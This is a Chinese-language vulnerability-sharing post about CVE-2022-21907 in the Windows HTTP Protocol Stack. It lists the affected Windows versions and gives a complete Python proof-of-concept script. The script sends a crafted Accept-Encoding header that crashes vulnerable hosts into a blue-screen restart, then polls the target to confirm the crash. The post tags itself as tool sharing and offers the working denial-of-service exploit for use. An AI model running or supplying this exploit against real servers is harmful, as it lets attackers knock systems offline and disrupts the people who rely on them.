【CVE-2022-21907】Microsoft Windows 安全漏洞

项目地址

https://github.com/Malwareman007/CVE-2022-21907

漏洞分享

Microsoft Windows是美国微软（Microsoft）公司的一套个人设备使用的操作系统。

Microsoft Windows HTTP Protocol Stack存在安全漏洞。以下产品和版本受到影响：Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation),Windows 11 for x64-based Systems,Windows 11 for ARM64-based Systems,Windows 10 Version 21H2 for 32-bit Systems,Windows 10 Version 21H2 for ARM64-based Systems,Windows 10 Version 21H2 for x64-based Systems,Windows 10 Version 21H1 for ARM64-based Systems,Windows 10 Version 21H1 for 32-bit Systems,Windows Server 2022,Windows Server 2022 (Server Core installation),Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 21H1 for x64-based Systems

漏洞POC

import requests
from loguru import logger
import time

header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36'}

class CVE_2022_21907():
    @logger.catch(level='ERROR')
    def first_handshake(self, target: str):
        try:
            resp = requests.get(target, headers=header, timeout=10)
            if resp.status_code == 200:
                logger.info(f'The first handshake: the target host is normal and can be verified by POC')
                return True
            logger.info(f'First handshake: the target host is normal, but returns an exception, status code: {resp.status_code}')
            return False
        except Exception as e:
            logger.info(f'First handshake error: The target host is abnormal, please check whether the target host is alive, error resp: {e}')
            return False

    @logger.catch(level='ERROR')
    def verify_handshake(self, target: str):
        try:
            resp = requests.get(target, headers=header, timeout=10)
            if resp.status_code == 200:
                logger.info(f'Verification result: The target host has restarted and returned to normal')
                return False
            logger.info(f'Verification result: The target host has restarted and returned to normal, but returned an exception with a status code: {resp.status_code}')
            return False
        except requests.exceptions.ConnectionError as e:
            logger.info(f'Verification result: The verification is successful, the target host is abnormal, has been exploited and entered the blue screen restart')
            return True

    @logger.catch(level='ERROR')
    def poc(self, target: str):
        # headers = {'Accept-Encoding': 'doar-e, ftw, imo, ,'}      # CVE-2021-31166
        headers = {
            'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA, '
                               'BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S, '
                               'RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF, '
                               'TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP, '
                               'OOOAOAOOOAOOAOOOAOOOAOOOAOO, '
                               '****************************stupiD, *, ,'
        }                                                           # CVE-2022-21907
        try:
            r = requests.get(target, headers=headers, timeout=10)
            logger.info(f'POC handshake failed: {target} does not exist CVE-2022-21907 Vulnerability, may have been patched')
            return False
        except requests.exceptions.ReadTimeout as e:
            logger.info(f'POC handshake success: {target} maybe can Exploit!')
            return True

    @logger.catch(level='ERROR')
    def dia(self, url: str):
        if 'http' not in url:
            target = f'http://{url}'
        elif 'https' in url:
            target = url.replace('https', 'http')
        else:
            target = url
        logger.info(f'start verification: {target}')
        if not self.first_handshake(target):
            logger.info(f'{target} does not exist CVE-2022-21907 Vulnerability')
            return
        self.poc(target)
        logger.info(f'Deterministic verification again')
        while True:
            time.sleep(10)
            if not self.verify_handshake(target):
                break
            logger.info(f'{target} have CVE-2022-21907 vulnerability, can be exploited!')

if __name__ == '__main__':
    cve = CVE_2022_21907()
    cve.dia("http://127.0.0.1/")

 

标签：工具分享, 漏洞分享, POC脚本